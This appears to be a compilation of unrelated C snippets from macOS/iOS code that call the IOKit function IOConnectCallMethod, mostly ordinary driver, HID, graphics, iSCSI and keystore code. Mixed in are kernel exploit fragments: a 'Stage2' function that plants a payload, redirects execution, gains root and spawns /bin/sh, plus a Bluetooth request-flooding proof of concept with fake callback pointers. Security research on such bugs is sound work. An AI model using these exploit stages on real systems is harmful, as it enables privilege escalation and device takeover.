void enkript_prologue(void) { if (IOConnectCallMethod == NULL) die("IOConnectCallMethod unavailable, require version >= 10.5"); /* get iterator to browse drivers of the chosen class */ io_iterator_t iterator; if (IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("com_enkript_driver_Service"), &iterator) != KERN_SUCCESS) die("IOServiceGetMatchingServices failed"); /* browse drivers */ for (io_service_t service = IOIteratorNext(iterator); service != IO_OBJECT_NULL; service = IOIteratorNext(iterator)) { debug("com_enkript_driver_Service instance found!"); /* open service */ io_connect_t connect = IO_OBJECT_NULL; if (IOServiceOpen(service, mach_task_self(), 0, &connect) != KERN_SUCCESS) die("IOServiceOpen failed"); /* call driver's open method */ if (IOConnectCallMethod(connect, 0 /* open, TOFIX */, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed"); /* call driver's hello method */ uint64_t buf = getpid(); if (IOConnectCallMethod(connect, 2 /* hello, TOFIX */, &buf, 1, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed"); /* call driver's close method */ if (IOConnectCallMethod(connect, 1 /* close, TOFIX */, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed"); /* close service */ if (IOServiceClose(connect) != KERN_SUCCESS) die("IOServiceClose failed"); } IOObjectRelease(iterator); }
/*! Receives data over a kernel socket associated with iSCSI. * @param sessionId the qualifier part of the ISID (see RFC3720). * @param connectionId the connection associated with the session. * @param bhs the basic header segment received over the connection. * @param data the data segment of the PDU received over the connection. * @param length the length of the data block received. * @return error code indicating result of operation. */ errno_t iSCSIKernelRecv(SID sessionId, CID connectionId, iSCSIPDUTargetBHS * bhs, void ** data, size_t * length) { // Check parameters if(sessionId == kiSCSIInvalidSessionId || connectionId == kiSCSIInvalidConnectionId || !bhs) return EINVAL; // Setup input scalar array const UInt32 inputCnt = 2; UInt64 inputs[] = {sessionId,connectionId}; size_t bhsLength = sizeof(iSCSIPDUTargetBHS); // Call kernel method to determine how much data there is to receive // The inputs are the sesssion qualifier and connection ID // The output is the size of the buffer we need to allocate to hold the data kern_return_t result; result = IOConnectCallMethod(connection,kiSCSIRecvBHS,inputs,inputCnt,NULL,0, NULL,NULL,bhs,&bhsLength); if(result != kIOReturnSuccess) return IOReturnToErrno(result); // Determine how much data to allocate for the data buffer *length = iSCSIPDUGetDataSegmentLength((iSCSIPDUCommonBHS *)bhs); // If no data, were done at this point if(*length == 0) return 0; *data = iSCSIPDUDataCreate(*length); if(*data == NULL) return EIO; // Call kernel method to get data from a receive buffer result = IOConnectCallMethod(connection,kiSCSIRecvData,inputs,inputCnt,NULL,0, NULL,NULL,*data,length); // If we failed, free the temporary buffer and quit with error if(result != kIOReturnSuccess) iSCSIPDUDataRelease(data); return IOReturnToErrno(result); }
/* Flush surface to visible region */ IOReturn IOAccelFlushSurfaceOnFramebuffers( IOAccelConnect connect, IOOptionBits options, UInt32 framebufferMask ) { uint64_t inData[] = { framebufferMask, options }; return IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceFlush, inData, arrayCnt(inData), NULL, 0,// input NULL, NULL, NULL, NULL); // output }
IOReturn IOAccelWriteUnlockSurfaceWithOptions( IOAccelConnect connect, IOOptionBits options ) { uint64_t inData = options; return IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceWriteUnlockOptions, &inData, 1, NULL, 0, // input NULL, NULL, NULL, NULL); // output }
static io_connect_t connect_to_keystore(void) { io_registry_entry_t apple_key_bag_service; kern_return_t result; io_connect_t keystore = MACH_PORT_NULL; apple_key_bag_service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(kAppleKeyStoreServiceName)); if (apple_key_bag_service == IO_OBJECT_NULL) { fprintf(stderr, "Failed to get service.\n"); return keystore; } result = IOServiceOpen(apple_key_bag_service, mach_task_self(), 0, &keystore); if (KERN_SUCCESS != result) fprintf(stderr, "Failed to open keystore\n"); if (keystore != MACH_PORT_NULL) { IOReturn kernResult = IOConnectCallMethod(keystore, kAppleKeyStoreUserClientOpen, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL); if (kernResult) { fprintf(stderr, "Failed to open AppleKeyStore: %x\n", kernResult); } } return keystore; }
kern_return_t fake_IOConnectCallMethod( mach_port_t connection, // In uint32_t selector, // In /*const*/ uint64_t *input, // In uint32_t inputCnt, // In /*const*/ void *inputStruct, // In size_t inputStructCnt, // In uint64_t *output, // Out uint32_t *outputCnt, // In/Out void *outputStruct, // Out size_t *outputStructCntP) // In/Out { kern_return_t ret = 0; ret = IOConnectCallMethod( connection, selector, input, inputCnt, inputStruct, inputStructCnt, output, outputCnt, outputStruct, outputStructCntP); return ret; }
// logging metadata, contains e.g. size of log1, pointer to current entry etc. // 0xc == AGCDebug static BOOL dumpLog0(io_connect_t connect) { kern_return_t kernResult; uint8_t buffer[0x100]; uint64_t scalarI_64[2] = { (uint64_t) buffer, 0x100 }; kernResult = IOConnectCallMethod(connect, // an io_connect_t returned from IOServiceOpen(). kGetAGCData, // selector of the function to be called via the user client. scalarI_64, // array of scalar (64-bit) input values. 2, // the number of scalar input values. NULL, // a pointer to the struct input parameter. 0, // the size of the input structure parameter. NULL, // array of scalar (64-bit) output values. NULL, // pointer to the number of scalar output values. NULL, // pointer to the struct output parameter. NULL // pointer to the size of the output structure parameter. ); if (kernResult == KERN_SUCCESS) { printf("getMuxState was successful.\n"); int i; for (i=0; i < 0x100; i++) { printf("0x%x: 0x%x\n", i, buffer[i]); } } else { printf("getMuxState returned 0x%08x.\n", kernResult); } return kernResult == KERN_SUCCESS; }
void create_requests(io_connect_t port) { struct BluetoothCall a; uint32_t i; kern_return_t kr; for (i = 0; i < 7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* DispatchHCIRequestCreate() */ a.index = 0x0; *(uint64_t *)a.args[0] = 5*1000; /* Timeout */ memset((void *)a.args[1], 0x81, 0x1000); memset((void *)a.args[2], 0x82, 0x1000); memset((void *)a.args[3], 0x83, 0x1000); memset((void *)a.args[4], 0x84, 0x1000); memset((void *)a.args[5], 0x85, 0x1000); memset((void *)a.args[6], 0x86, 0x1000); for(i = 0; i < 500; i++) { kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ if(kr == 0xe00002bd) /* Full */ break; } }
/*! Gets an array of connection identifiers for each session. * @param sessionId session identifier. * @param connectionIds an array of connection identifiers for the session. * @param connectionCount number of connection identifiers. * @return error code indicating result of operation. */ errno_t iSCSIKernelGetConnectionIds(SID sessionId, CID * connectionIds, UInt32 * connectionCount) { if(sessionId == kiSCSIInvalidSessionId || !connectionIds || !connectionCount) return EINVAL; const UInt32 inputCnt = 1; UInt64 input = sessionId; const UInt32 expOutputCnt = 1; UInt64 output; UInt32 outputCnt = expOutputCnt; *connectionCount = 0; size_t outputStructSize = sizeof(CID)*kiSCSIMaxConnectionsPerSession; kern_return_t result = IOConnectCallMethod(connection,kiSCSIGetConnectionIds,&input,inputCnt,0,0, &output,&outputCnt,connectionIds,&outputStructSize); if(result == kIOReturnSuccess && outputCnt == expOutputCnt) *connectionCount = (UInt32)output; return IOReturnToErrno(result); }
krb5_error_code kcm_create_key(krb5_uuid uuid) { io_connect_t conn; createKeyGetUUID_InStruct_t createKey; kern_return_t kr; uuid_OutStruct_t key; size_t outputStructSize = sizeof(key); conn = openiodev(); if (conn == IO_OBJECT_NULL) return EINVAL; createKey.keySizeInBytes = V1_KEYSIZE; createKey.algorithm = fDE_ALG_AESXTS; memset(&key, 0, sizeof(key)); kr = IOConnectCallMethod(conn, kAppleFDEKeyStore_createKeyGetUUID, NULL, 0, &createKey, sizeof(createKey), NULL, 0, &key, &outputStructSize); closeiodev(conn); if (kr != KERN_SUCCESS) return EINVAL; memcpy(uuid, key.uuid, sizeof(key.uuid)); return 0; }
/*! Sends data over a kernel socket associated with iSCSI. * @param sessionId the qualifier part of the ISID (see RFC3720). * @param connectionId the connection associated with the session. * @param bhs the basic header segment to send over the connection. * @param data the data segment of the PDU to send over the connection. * @param length the length of the data block to send over the connection. * @return error code indicating result of operation. */ errno_t iSCSIKernelSend(SID sessionId, CID connectionId, iSCSIPDUInitiatorBHS * bhs, void * data, size_t length) { // Check parameters if(sessionId == kiSCSIInvalidSessionId || connectionId == kiSCSIInvalidConnectionId || !bhs || (!data && length > 0)) return EINVAL; // Setup input scalar array const UInt32 inputCnt = 2; const UInt64 inputs[] = {sessionId, connectionId}; // Call kernel method to send (buffer) bhs and then data kern_return_t result; result = IOConnectCallStructMethod(connection,kiSCSISendBHS,bhs, sizeof(iSCSIPDUInitiatorBHS),NULL,NULL); if(result != kIOReturnSuccess) return IOReturnToErrno(result); return IOReturnToErrno(IOConnectCallMethod(connection,kiSCSISendData,inputs,inputCnt, data,length,NULL,NULL,NULL,NULL)); }
/*! Looks up the connection identifier associated with a particular portal address. * @param sessionId the session identifier. * @param portalAddress the address passed to iSCSIKernelCreateSession() or * iSCSIKernelCreateConnection() when the connection was created. * @return the associated connection identifier. */ CID iSCSIKernelGetConnectionIdForPortalAddress(SID sessionId, CFStringRef portalAddress) { if(sessionId == kiSCSIInvalidSessionId || !portalAddress) return EINVAL; const UInt32 inputCnt = 1; UInt64 input = sessionId; const UInt32 expOutputCnt = 1; UInt64 output[expOutputCnt]; UInt32 outputCnt = expOutputCnt; kern_return_t result = IOConnectCallMethod(connection,kiSCSIGetConnectionIdForPortalAddress, &input,inputCnt, CFStringGetCStringPtr(portalAddress,kCFStringEncodingASCII), CFStringGetLength(portalAddress)+1, output,&outputCnt,0,0); if(result != kIOReturnSuccess || outputCnt != expOutputCnt) return kiSCSIInvalidConnectionId; return (CID)output[0]; }
void test_io_connect_method(io_connect_t conn, int selector, uint64_t* scalar_input, uint32_t scalar_input_cnt, unsigned char* struct_input, size_t struct_input_cnt, int scalar_output_cnt, int struct_output_cnt) { uint64_t outputScalar[16]; uint32_t outputScalarCnt = scalar_output_cnt; char outputStruct[4096]; size_t outputStructCnt = struct_output_cnt; int index = selector; printf("IOConnectCall (selector = %d)\n", index); //getchar(); kern_return_t err = IOConnectCallMethod( conn, index, scalar_input, scalar_input_cnt, struct_input, struct_input_cnt, outputScalar, &outputScalarCnt, outputStruct, &outputStructCnt); if (err != KERN_SUCCESS){ printf("IOConnectCall (%d) error: %x\n", index, err); } }
static BOOL dumpLog1(io_connect_t connect) { kern_return_t kernResult; uint8_t buffer[LOGSIZE]; uint64_t scalarI_64[2] = { (uint64_t) buffer, LOGSIZE }; kernResult = IOConnectCallMethod(connect, // an io_connect_t returned from IOServiceOpen(). kGetAGCData_log1, // selector of the function to be called via the user client. scalarI_64, // array of scalar (64-bit) input values. 2, // the number of scalar input values. NULL, // a pointer to the struct input parameter. 0, // the size of the input structure parameter. NULL, // array of scalar (64-bit) output values. NULL, // pointer to the number of scalar output values. NULL, // pointer to the struct output parameter. NULL // pointer to the size of the output structure parameter. ); if (kernResult == KERN_SUCCESS) { printf("getMuxState was successful.\n"); FILE *logfile; logfile = fopen("log.bin", "wb"); if (!logfile) { printf("cannot open file\n"); } else { fwrite(buffer, sizeof(uint8_t), LOGSIZE, logfile); fclose(logfile); } } else { printf("getMuxState returned 0x%08x.\n", kernResult); } return kernResult == KERN_SUCCESS; }
kern_return_t IOHIDSetCursorEnable( io_connect_t connect, boolean_t enable ) { uint64_t inData = enable; return IOConnectCallMethod( connect, 2, // Index &inData, 1, NULL, 0, // Input NULL, NULL, NULL, NULL); // Output }
int Stage2(void) { int i; unsigned char *p; unsigned char *p_ptr; kern_return_t k_error; char UselessStruct[4096]; size_t UselessStructSize = 0x14; p = (unsigned char*)mem; p_ptr = p + OFFSET_ROOM; printf("Stage2: preparing the stage2 payload \n"); unsigned char *t = (unsigned char*)&stage2; *(uint64_t*)(t + OFF_API_CURRENT_PROC) = api_current_proc; *(uint64_t*)(t + OFF_API_PROC_UCRED) = api_proc_ucred; *(uint64_t*)(t + OFF_API_POSIX_CRED_GET) = api_posix_cred_get; *(uint64_t*)(t + OFF_API_CHGPROCCNT) = api_chgproccnt; printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1)); memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2)); printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START); *(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START; printf("Stage2: Copying trigger data \n"); *(uint64_t*)p_ptr = INIT_SIG; printf("Stage2: Making stage2 call\n"); k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize); setuid(0); if (getuid() == 0) { printf("Stage2: success, got root! \n"); printf("Stage2: now executing shell \n"); system("/bin/sh"); exit(0); } printf("Stage2: failed! \n"); return -1; }
extern kern_return_t IOHIDSetCursorBounds( io_connect_t connect, const IOGBounds * bounds ) { if ( !bounds ) return kIOReturnBadArgument; return IOConnectCallMethod(connect, 6, // Index NULL, 0, bounds, sizeof(*bounds), // Input, NULL, NULL, NULL, NULL); // Output }
IOReturn IOAccelReadSurface( IOAccelConnect connect, IOAccelSurfaceReadData * parameters ) { IOReturn result; result = IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceRead, NULL, 0, parameters, sizeof( IOAccelSurfaceReadData), // input NULL, NULL, NULL, NULL); // no output return result; }
uint64_t map_user_memory(mach_port_t conn) { kern_return_t err; void* mem = malloc(0x20000); // make sure that the address we pass is page-aligned: mem = (void*) ((((uint64_t)mem)+0x1000)&~0xfff); printf("trying to map user pointer: %p\n", mem); uint64_t inputScalar[16] = {0}; uint64_t inputScalarCnt = 0; char inputStruct[4096] = {0}; size_t inputStructCnt = 0; uint64_t outputScalar[16] = {0}; uint32_t outputScalarCnt = 0; char outputStruct[4096] = {0}; size_t outputStructCnt = 0; inputScalarCnt = 0; inputStructCnt = 0x10; outputScalarCnt = 4096; outputStructCnt = 16; struct mem_desc* md = (struct mem_desc*)inputStruct; md->ptr = (uint64_t)mem; md->size = 0x1000; err = IOConnectCallMethod( conn, 0x200, // IGAccelGLContext::map_user_memory inputScalar, inputScalarCnt, inputStruct, inputStructCnt, outputScalar, &outputScalarCnt, outputStruct, &outputStructCnt); if (err != KERN_SUCCESS){ printf("IOConnectCall error: %x\n", err); //return 0; } else{ printf("worked? outputScalarCnt = %d\n", outputScalarCnt); } printf("outputScalarCnt = %d\n", outputScalarCnt); md = (struct mem_desc*)outputStruct; printf("0x%llx :: 0x%llx\n", md->ptr, md->size); return (uint64_t)mem; }
kern_return_t IOHIDSetFixedMouseLocation( io_connect_t connect, int32_t x, int32_t y ) { int32_t data[3] = {x, y, 0}; data[2] = getpid(); return IOConnectCallMethod(connect, 4, // Index NULL, 0, data, sizeof(data), // Input NULL, NULL, NULL, NULL); // Output }
static void closeiodev(io_connect_t conn) { kern_return_t kr; kr = IOConnectCallMethod(conn, kAppleFDEKeyStoreUserClientClose, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL); if (kr != KERN_SUCCESS) return; IOServiceClose(conn); }
kern_return_t IOHIDPostEvent( io_connect_t connect, UInt32 eventType, IOGPoint location, const NXEventData * eventData, UInt32 eventDataVersion, IOOptionBits eventFlags, IOOptionBits options ) { int * eventPid = 0; size_t dataSize = sizeof(struct evioLLEvent) + sizeof(int); char data[dataSize]; struct evioLLEvent* event; UInt32 eventDataSize = sizeof(NXEventData); bzero(data, dataSize); event = (struct evioLLEvent*)data; event->type = eventType; event->location = location; event->flags = eventFlags; event->setFlags = options; event->setCursor = options & (kIOHIDSetCursorPosition | kIOHIDSetRelativeCursorPosition); eventPid = (int *)(event + 1); *eventPid = getpid(); if ( eventDataVersion < 2 ) { // Support calls from legacy IOHIDPostEvent clients. // 1. NXEventData was 32 bytes long. // 2. eventDataVersion was (boolean_t) setCursor eventDataSize = 32; event->setCursor = eventDataVersion; // 0 or 1 } if ( eventDataSize < sizeof(event->data) ) { bcopy( eventData, &(event->data), eventDataSize ); bzero( ((UInt8 *)(&(event->data))) + eventDataSize, sizeof(event->data) - eventDataSize ); } else bcopy( eventData, &event->data, sizeof(event->data) ); // Let PM log the software HID events _IOPMReportSoftwareHIDEvent(event->type); return IOConnectCallMethod(connect, 3, // Index NULL, 0, data, dataSize, // Input NULL, NULL, NULL, NULL); // Output }
static CFDataRef create_keybag(keybag_handle_t bag_type, CFDataRef password) { uint64_t inputs[] = { bag_type }; uint64_t outputs[] = {0}; uint32_t num_inputs = array_size(inputs); uint32_t num_outputs = array_size(outputs); IOReturn kernResult; io_connect_t keystore; unsigned char keybagdata[4096]; //Is that big enough? size_t keybagsize=sizeof(keybagdata); keystore=connect_to_keystore(); kernResult = IOConnectCallMethod(keystore, kAppleKeyStoreKeyBagCreate, inputs, num_inputs, NULL, 0, outputs, &num_outputs, NULL, 0); if (kernResult) { fprintf(stderr, "kAppleKeyStoreKeyBagCreate: 0x%x\n", kernResult); return NULL; } /* Copy out keybag */ inputs[0]=outputs[0]; num_inputs=1; kernResult = IOConnectCallMethod(keystore, kAppleKeyStoreKeyBagCopy, inputs, num_inputs, NULL, 0, NULL, 0, keybagdata, &keybagsize); if (kernResult) { fprintf(stderr, "kAppleKeyStoreKeyBagCopy: 0x%x\n", kernResult); return NULL; } return CFDataCreate(kCFAllocatorDefault, keybagdata, keybagsize); }
void create_requests(io_connect_t port) { BluetoothCall a; BluetoothHCIRequestCallbackInfo cb; uint32_t i; kern_return_t kr; for (i=0; i<7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* DispatchHCIRequestCreate() */ a.index = 0x0; *(uint64_t *)a.args[0] = 5432; /* Timeout */ *(uint64_t *)a.args[1] = 1; /* DoAsyncNotify */ cb.userCallback = (uint64_t *)0x4141414141414141; cb.userRefCon = (uint64_t *)0x4242424242424242; cb.internalRefCon = (uint64_t *)0x4343434343434343; cb.asyncIDRefCon = (uint64_t *)0x4444444444444444; cb.reserved = (uint64_t *)0x4545454545454545; a.args[2] = (uint64_t)&cb; /* CallbackInfo */ a.sizes[2] = sizeof(cb); *(uint64_t *)a.args[3] = 0; /* This appears to be ignored */ *(uint64_t *)a.args[4] = 0; /* outRequestId (no real need to set it, just a reminder */ #ifdef DEBUG for(i = 0; i<120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); #endif for(i = 0; i < 500; i++) { kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ /* Max number of requests reached */ if(kr == 0xe00002bd) break; } printf(" [+] Created %d requests!\n", i); }
extern kern_return_t IOHIDSetOnScreenCursorBounds( io_connect_t connect, const IOGPoint * point, const IOGBounds * bounds ) { if ( !bounds || !point ) return kIOReturnBadArgument; int16_t data[6] = {point->x, point->y, bounds->minx, bounds->miny, bounds->maxx, bounds->maxy}; return IOConnectCallMethod(connect, 12, // Index NULL, 0, data, sizeof(data), // Input, NULL, NULL, NULL, NULL); // Output }
IOReturn IOAccelWriteLockSurfaceWithOptions( IOAccelConnect connect, IOOptionBits options, IOAccelSurfaceInformation * info, UInt32 infoSize ) { uint64_t inData = options; size_t size = (size_t) infoSize; IOReturn ret = IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceWriteLockOptions, &inData, 1, // in scalar NULL, 0, // in struct NULL, NULL, // out scalar info, &size); // out struct return ret; }
kern_return_t IOHIDCreateSharedMemory( io_connect_t connect, unsigned int version ) { #if !TARGET_OS_EMBEDDED IOFramebufferServerStart(); #endif uint64_t inData = version; return IOConnectCallMethod( connect, 0, // Index &inData, 1, NULL, 0, // Input NULL, NULL, NULL, NULL); // Output }
IOReturn IOAccelSetSurfaceFramebufferShape( IOAccelConnect connect, IOAccelDeviceRegion *rgn, eIOAccelSurfaceShapeBits options, UInt32 framebufferIndex ) { uint64_t inData[] = { options, framebufferIndex }; IOReturn result; size_t rgnSize = regionSize(rgn); result = IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceSetShape, inData, arrayCnt(inData), rgn, rgnSize, NULL, NULL, NULL, NULL); // no output return result; }
void make_iokit_call(){ IOConnectCallMethod( global_conn, selector, inputScalar, inputScalarCnt, inputStruct, inputStructCnt, outputScalar, &outputScalarCnt, outputStruct, &outputStructCnt); }
kern_return_t IOHIDSetVirtualDisplayBounds( io_connect_t handle, UInt32 display_token, const IOGBounds * bounds ) { kern_return_t err; uint64_t inData[5] = {display_token, bounds->minx, bounds->maxx, bounds->miny, bounds->maxy}; uint32_t outCount = 0; err = IOConnectCallMethod(handle, 9, // Index inData, 5, NULL, 0, // Input NULL, &outCount, NULL, NULL); // Output return err; }